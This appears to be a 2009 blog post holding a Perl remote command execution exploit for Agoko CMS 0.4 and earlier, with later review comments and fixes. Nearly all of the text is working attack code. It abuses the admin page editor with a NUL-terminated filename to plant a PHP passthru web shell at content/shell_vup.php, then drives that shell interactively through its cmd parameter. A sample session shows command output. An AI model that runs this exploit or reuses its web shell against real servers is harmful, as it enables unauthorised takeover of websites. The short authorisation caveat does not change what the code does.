Saturday, September 12, 2009

Agoko CMS <= 0.4 remote command execution exploit — abuses the page editor at admintools/editpage-2.php (a NUL-terminated "filename" plus attacker-supplied "text") to write a small PHP command shell to content/shell_vup.php, then drives that shell through its ?cmd= parameter. Published as a proof of concept; use only against systems you are authorised to test.

#!/usr/bin/perl

# Banner printed on every run.  A single-quoted heredoc, like the original
# q~...~, interpolates nothing; the leading blank line is part of the output.
print <<'BANNER';

--------------------------------------------------
Agoko CMS <= 0.4 remote commands execution exploit
by staker
mail: staker[at]hotmail[dot]it
--------------------------------------------------

[*] Usage -> perl [xpl.pl] [host] [path]
[*] Example -> perl agk.pl localhost /Agoko

BANNER


#>-----------<#
#>- Working -<#
#>-----------<#########################################
# staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko #
# #
# -------------------------------------------------- #
# Agoko CMS <= 0.4 remote commands execution exploit #
# by staker #
# mail: staker[at]hotmail[dot]it #
# -------------------------------------------------- #
# #
# [*] Usage -> perl [xpl.pl] [host] [path] #
# [*] Example -> perl agk.pl localhost /Agoko #
# #
# shell already exists. #
# #
# Agoko[shell]:~$ uname -n -r #
# #
# death 2.6.27-7-generic #
#######################################################


use strict;
use warnings;

use IO::Socket;
use LWP::Simple;


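# Command line: <host> <path>.  Print the usage hint and exit non-zero
# instead of exiting silently (and with status 0) when an argument is
# missing, as the original did.
my $host = shift;
my $path = shift;

unless (defined $host && length $host && defined $path && length $path) {
    print "[*] Usage -> perl $0 [host] [path]\n";
    exit(1);
}

# Normalise the application path so "/Agoko", "Agoko/" and "Agoko" all end
# up as "/Agoko/..." in the request targets built by the subs below (the
# original produced "//Agoko/..." for the documented "/Agoko" example).
$path =~ s{^/+}{};
$path =~ s{/+$}{};

check_shell($host, $path);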


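# Probe for an already-planted backdoor at content/shell_vup.php.  The
# planted file answers "bany wtf" (see inject_shell) when called without a
# ?cmd= parameter, so that string identifies this script's own shell as
# opposed to an unrelated file or an error page.  Falls through to
# inject_shell() when the marker is absent.
#
# Note(review): the bany=love_me cookie is sent on every request in this
# script; its purpose is not evident from the code - possibly something
# application-specific, possibly just a marker.  Confirm against the target
# before relying on it.
#
# Args:    $host - target hostname/IP (or host:port) from the command line
#          $path - application path under the web root, e.g. "Agoko"
# Returns: nothing useful; on success hands control to load_cmd().
# Dies:    when host or path is missing (the original died with an unrelated $!).
sub check_shell {
    my ($host, $path) = @_;
    die "[*] check_shell: host and path are required\n"
        unless defined $host && defined $path && length $path;

    my $request = join '',
        "GET /$path/content/shell_vup.php HTTP/1.1\r\n",
        "Host: $host\r\n",
        "Cookie: bany=love_me\r\n",
        "User-Agent: Lynx (textmode)\r\n",
        "Connection: close\r\n\r\n";

    my $response = give_kt($host, $request);

    if ($response =~ /bany wtf/i) {
        print "[*] shell already exists.\n";
        load_cmd($host, $path);
    }
    else {
        print "[*] exploiting..\n";
        inject_shell($host, $path);
    }
    return;
}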


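# Plant the backdoor.  The application's page editor (admintools/editpage-2.php)
# takes "filename" and "text" form fields and stores the text as a file under
# content/; this POST makes it write a minimal PHP command shell as
# content/shell_vup.php.  Success is recognised by the application's German
# success message "erfolgreich eingetragen" (the submit button is "Speichern",
# i.e. Save), so a differently localised install is reported as a failure
# even if the write went through.
#
# Note(review): the "\x00" appended to the filename is presumably there to
# truncate a suffix the application adds, so the stored name ends in ".php".
# PHP 5.3.4 and later reject NUL bytes in filesystem paths, so this most
# likely fails against newer targets - confirm before relying on it.
#
# Args:    $host, $path - as for check_shell()
# Returns: does not return on success (hands over to load_cmd()); dies on failure.
sub inject_shell {
    my ($host, $path) = @_;

    # The original listing carried this payload as a \xNN hex string; this is
    # the same PHP, decoded: run ?cmd= through passthru(), otherwise emit the
    # marker text that check_shell() looks for.
    my $shell = q{<?php error_reporting(E_ALL); }
              . q{if (isset($_GET['cmd'])) passthru(stripslashes($_GET['cmd'])); }
              . q{else die("bany wtf"); ?>};

    # Build the body with proper application/x-www-form-urlencoded escaping.
    # The original sent the PHP source and the NUL byte raw, which presumably
    # only worked because the payload happens to contain no '&', '=' or '%'.
    my %field = (
        filename => "shell_vup.php\x00",
        text     => $shell,
        Submit   => 'Speichern',
    );
    my $data = join '&', map {
        (my $v = $field{$_}) =~ s/([^A-Za-z0-9_.~-])/sprintf('%%%02X', ord($1))/ge;
        "$_=$v";
    } qw(filename text Submit);

    my $request = join '',
        "POST /$path/admintools/editpage-2.php HTTP/1.1\r\n",
        "Host: $host\r\n",
        "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n",
        "Cookie: bany=love_me\r\n",
        "Content-Type: application/x-www-form-urlencoded\r\n",
        "Content-Length: " . length($data) . "\r\n",
        "Connection: close\r\n\r\n",
        $data;

    my $response = give_kt($host, $request);

    if ($response =~ /erfolgreich eingetragen/i) {
        load_cmd($host, $path);
    }
    else {
        # Show the status line so a 401/403/404 is distinguishable from a
        # request that was accepted but answered with unexpected content.
        my ($status) = $response =~ /\A(HTTP\/\S+[^\r\n]*)/;
        $status = 'no/unknown response' unless defined $status;
        die "[*] Exploit failed ($status).\n";
    }
    return;
}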


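# Interactive loop over the planted shell: read a command line from STDIN,
# send it as ?cmd= to content/shell_vup.php and print the response body.
# "exit", "quit" or "out" - or EOF on STDIN - ends the session.
#
# Args:    $host, $path - as for check_shell()
# Returns: nothing; exits the process on an explicit exit command.
sub load_cmd {
    my ($host, $path) = @_;

    my $shell_url = "http://$host/$path/content/shell_vup.php";

    while (1) {
        print "\nAgoko[shell]:~\$ ";

        # The <STDIN> read was lost when the original listing was rendered.
        # An undefined read (EOF) ends the loop instead of spinning forever.
        my $cmd = <STDIN>;
        last unless defined $cmd;
        chomp $cmd;

        exit(0) if $cmd =~ /^(exit|quit|out)+$/i;
        next unless length $cmd;

        # Percent-encode the command so spaces, '&', '#', '+' and the like
        # reach the shell instead of being interpreted as URL syntax.
        (my $encoded = $cmd) =~ s/([^A-Za-z0-9_.~-])/sprintf('%%%02X', ord($1))/ge;

        # getprint() (LWP::Simple) writes the body to STDOUT and returns the
        # HTTP status code; say so when the shell did not answer 2xx.
        my $status = getprint("$shell_url?cmd=$encoded");
        print "[*] request failed (HTTP $status)\n" unless $status =~ /^2/;
    }
    return;
}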


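# Send one raw HTTP request to $target and return the complete response
# (status line, headers and body) as a single string.  The request is
# expected to carry "Connection: close": the reader simply drains the socket
# to EOF.
#
# Args:    $target  - hostname or IP; IO::Socket::INET also accepts
#                     "host:port", which then overrides the default port 80
#          $request - the full request text, CRLF line endings included
# Returns: the raw response text (possibly empty if the server sent nothing).
# Dies:    when an argument is missing, the connection fails, or the write fails.
sub give_kt {
    my ($target, $request) = @_;
    die "[*] give_kt: target and request are required\n"
        unless defined $target && defined $request;

    # Timeout bounds the connect; without it a filtered port hangs the script.
    # IO::Socket reports its error in $@ (and usually $!) - the original only
    # looked at $!.
    my $sock = IO::Socket::INET->new(
        PeerAddr => $target,
        PeerPort => 80,
        Proto    => 'tcp',
        Timeout  => 30,
    ) or die "[*] connect to $target failed: " . ($@ || $!) . "\n";

    # print() writes the whole buffer and reports failure; the original's
    # send() could return short and was never checked.
    print {$sock} $request
        or die "[*] write to $target failed: $!\n";

    my $response = '';
    while (my $chunk = <$sock>) {
        $response .= $chunk;
    }
    close $sock;

    return $response;
}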
